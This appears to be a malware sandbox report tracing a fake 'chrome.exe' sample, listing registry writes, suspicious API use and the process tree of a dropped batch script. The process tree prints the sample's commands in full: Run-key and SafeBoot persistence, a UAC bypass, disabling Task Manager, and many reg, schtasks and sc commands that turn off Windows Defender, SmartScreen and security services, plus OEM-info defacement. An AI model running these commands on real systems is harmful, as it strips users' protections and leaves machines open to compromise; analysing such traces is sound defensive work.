Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-100#immutable1 = "Recover copies of your files backed up in Windows 7"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-1#immutable1 = "Troubleshooting"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	control.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-2#immutable1 = "Check network status, change network settings and set preferences for sharing files and printers."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-159#immutable1 = "Programs and Features"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-2000#immutable1 = "View and manage devices, printers, and print jobs"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-2#immutable1 = "Keep a history of your files"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	control.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-1#immutable1 = "Default Programs"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Defender Firewall"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

pid	Process
1436	reg.exe
2064	reg.exe
572	reg.exe
1944	reg.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5068	explorer.exe

Suspicious behavior: SetClipboardViewer 4 IoCs

pid	Process
5504	mmc.exe
2816	mmc.exe
5772	mmc.exe
4504	mmc.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5068	explorer.exe
Token: SeCreatePagefilePrivilege	5068	explorer.exe
Token: 33	5524	mmc.exe
Token: SeIncBasePriorityPrivilege	5524	mmc.exe
Token: 33	5524	mmc.exe
Token: SeIncBasePriorityPrivilege	5524	mmc.exe
Token: 33	5504	mmc.exe
Token: SeIncBasePriorityPrivilege	5504	mmc.exe
Token: 33	5504	mmc.exe
Token: SeIncBasePriorityPrivilege	5504	mmc.exe
Token: SeTakeOwnershipPrivilege	2056	takeown.exe
Token: SeShutdownPrivilege	5640	control.exe
Token: SeCreatePagefilePrivilege	5640	control.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: 33	4504	mmc.exe
Token: SeIncBasePriorityPrivilege	4504	mmc.exe
Token: 33	4504	mmc.exe
Token: SeIncBasePriorityPrivilege	4504	mmc.exe
Token: 33	4504	mmc.exe
Token: SeIncBasePriorityPrivilege	4504	mmc.exe
Token: 33	4504	mmc.exe
Token: SeIncBasePriorityPrivilege	4504	mmc.exe
Token: 33	4504	mmc.exe
Token: SeIncBasePriorityPrivilege	4504	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	5772	mmc.exe
Token: SeIncBasePriorityPrivilege	5772	mmc.exe
Token: 33	2816	mmc.exe
Token: SeIncBasePriorityPrivilege	2816	mmc.exe
Token: 33	2816	mmc.exe
Token: SeIncBasePriorityPrivilege	2816	mmc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5068	explorer.exe
2764	SndVol.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2764	SndVol.exe
2764	SndVol.exe
2764	SndVol.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
5524	mmc.exe
5524	mmc.exe
5504	mmc.exe
5504	mmc.exe
4980	rundll32.exe
2312	msconfig.exe
2312	msconfig.exe
2816	mmc.exe
2816	mmc.exe
2816	mmc.exe
2816	mmc.exe
5772	mmc.exe
5772	mmc.exe
4504	mmc.exe
4504	mmc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 5728	2372	chrome.exe	78
PID 2372 wrote to memory of 5728	2372	chrome.exe	78
PID 5728 wrote to memory of 420	5728	cmd.exe	82
PID 5728 wrote to memory of 420	5728	cmd.exe	82
PID 5728 wrote to memory of 3224	5728	cmd.exe	83
PID 5728 wrote to memory of 3224	5728	cmd.exe	83
PID 5728 wrote to memory of 1436	5728	cmd.exe	84
PID 5728 wrote to memory of 1436	5728	cmd.exe	84
PID 5728 wrote to memory of 2064	5728	cmd.exe	85
PID 5728 wrote to memory of 2064	5728	cmd.exe	85
PID 5728 wrote to memory of 572	5728	cmd.exe	86
PID 5728 wrote to memory of 572	5728	cmd.exe	86
PID 5728 wrote to memory of 1944	5728	cmd.exe	87
PID 5728 wrote to memory of 1944	5728	cmd.exe	87
PID 5728 wrote to memory of 4724	5728	cmd.exe	88
PID 5728 wrote to memory of 4724	5728	cmd.exe	88
PID 5728 wrote to memory of 1480	5728	cmd.exe	89
PID 5728 wrote to memory of 1480	5728	cmd.exe	89
PID 5728 wrote to memory of 4512	5728	cmd.exe	90
PID 5728 wrote to memory of 4512	5728	cmd.exe	90
PID 5728 wrote to memory of 2020	5728	cmd.exe	91
PID 5728 wrote to memory of 2020	5728	cmd.exe	91
PID 5728 wrote to memory of 4876	5728	cmd.exe	92
PID 5728 wrote to memory of 4876	5728	cmd.exe	92
PID 5728 wrote to memory of 4860	5728	cmd.exe	93
PID 5728 wrote to memory of 4860	5728	cmd.exe	93
PID 5728 wrote to memory of 4888	5728	cmd.exe	94
PID 5728 wrote to memory of 4888	5728	cmd.exe	94
PID 5728 wrote to memory of 4812	5728	cmd.exe	95
PID 5728 wrote to memory of 4812	5728	cmd.exe	95
PID 5728 wrote to memory of 5276	5728	cmd.exe	98
PID 5728 wrote to memory of 5276	5728	cmd.exe	98
PID 5728 wrote to memory of 5800	5728	cmd.exe	99
PID 5728 wrote to memory of 5800	5728	cmd.exe	99
PID 5728 wrote to memory of 1160	5728	cmd.exe	102
PID 5728 wrote to memory of 1160	5728	cmd.exe	102
PID 5728 wrote to memory of 4900	5728	cmd.exe	103
PID 5728 wrote to memory of 4900	5728	cmd.exe	103
PID 5728 wrote to memory of 5284	5728	cmd.exe	105
PID 5728 wrote to memory of 5284	5728	cmd.exe	105
PID 5728 wrote to memory of 4404	5728	cmd.exe	107
PID 5728 wrote to memory of 4404	5728	cmd.exe	107
PID 5728 wrote to memory of 2316	5728	cmd.exe	108
PID 5728 wrote to memory of 2316	5728	cmd.exe	108
PID 5728 wrote to memory of 5524	5728	cmd.exe	112
PID 5728 wrote to memory of 5524	5728	cmd.exe	112
PID 5728 wrote to memory of 4936	5728	cmd.exe	114
PID 5728 wrote to memory of 4936	5728	cmd.exe	114
PID 5728 wrote to memory of 2872	5728	cmd.exe	116
PID 5728 wrote to memory of 2872	5728	cmd.exe	116
PID 5728 wrote to memory of 5832	5728	cmd.exe	117
PID 5728 wrote to memory of 5832	5728	cmd.exe	117
PID 5728 wrote to memory of 6020	5728	cmd.exe	118
PID 5728 wrote to memory of 6020	5728	cmd.exe	118
PID 5728 wrote to memory of 4456	5728	cmd.exe	119
PID 5728 wrote to memory of 4456	5728	cmd.exe	119
PID 5728 wrote to memory of 3000	5728	cmd.exe	120
PID 5728 wrote to memory of 3000	5728	cmd.exe	120
PID 5728 wrote to memory of 5504	5728	cmd.exe	121
PID 5728 wrote to memory of 5504	5728	cmd.exe	121
PID 5728 wrote to memory of 2764	5728	cmd.exe	122
PID 5728 wrote to memory of 2764	5728	cmd.exe	122
PID 5728 wrote to memory of 4524	5728	cmd.exe	123
PID 5728 wrote to memory of 4524	5728	cmd.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\chrome.exe
"C:\Users\Admin\AppData\Local\Temp\chrome.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1CE.tmp\A1CF.tmp\A1D0.bat C:\Users\Admin\AppData\Local\Temp\chrome.exe"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:5728
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v sex.exe /d "C:\Windows\System32\sex.exe"
    3⤵
    - Adds Run key to start application
    PID:420
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 1
    3⤵
    PID:3224
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:1436
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:2064
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f
    3⤵
    - Modifies registry key
    PID:572
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "NeoandRedV" /f
    3⤵
    - Modifies registry key
    PID:1944
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f
    3⤵
    PID:4724
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Red_V" /f
    3⤵
    PID:1480
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "United Red_V of Neo" /f
    3⤵
    PID:4512
- - C:\Windows\system32\timeout.exe
    timeout 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2020
- - C:\Windows\system32\control.exe
    control
    3⤵
    - Modifies registry class
    PID:4876
- - C:\Windows\system32\cttune.exe
    cttune
    3⤵
    PID:4860
- - C:\Windows\system32\DisplaySwitch.exe
    displayswitch.exe
    3⤵
    PID:4888
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 0
    3⤵
    PID:4812
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 1
    3⤵
    PID:5276
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo, Red_V"
    3⤵
    PID:5800
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "YOU HAVE BEEN FUCKED"
    3⤵
    PID:1160
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "NEO"
    3⤵
    PID:4900
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "NEO"
    3⤵
    PID:5284
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"
    3⤵
    PID:4404
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 0
    3⤵
    PID:2316
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\devmgmt.msc"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5524
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"
    3⤵
    PID:4936
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"
    3⤵
    PID:2872
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"
    3⤵
    PID:5832
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"
    3⤵
    PID:6020
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"
    3⤵
    PID:4456
- - C:\Windows\system32\dxdiag.exe
    dxdiag
    3⤵
    PID:3000
- - C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\diskmgmt.msc"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5504
- - C:\Windows\system32\SndVol.exe
    SndVol.exe
    3⤵
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2764
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\player.vbs"
    3⤵
    PID:4524
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    3⤵
    - Modifies Windows Defender TamperProtection settings
    PID:4796
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4740
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:1732
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:1564
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:6128
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /
    3⤵
    PID:736
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:4208
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
    3⤵
    PID:5028
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:3076
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
    3⤵
    PID:6072
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
    3⤵
    PID:6108
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:5772
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1464
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1972
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2636
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3988
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3432
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5672
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:3872
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:1700
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:1584
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:3260
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1936
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1468
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1880
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:720
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:1912
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:3352
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:1600
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:2144
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3492
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3404
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3444
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:5860
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:6068
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:2992
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:5380
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:3316
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:5760
- - C:\Windows\system32\sc.exe
    sc config webthreatdefsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:5824
- - C:\Windows\system32\sc.exe
    sc config webthreatdefusersvc start= disabledreg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
    3⤵
    - Launches sc.exe
    PID:2820
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f
    3⤵
    PID:1604
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f
    3⤵
    PID:436
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
    3⤵
    PID:3928
- - C:\Windows\system32\takeown.exe
    takeown /s KMOMNOMO /u Admin /f "C:\Windows\System32\smartscreen.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F
    3⤵
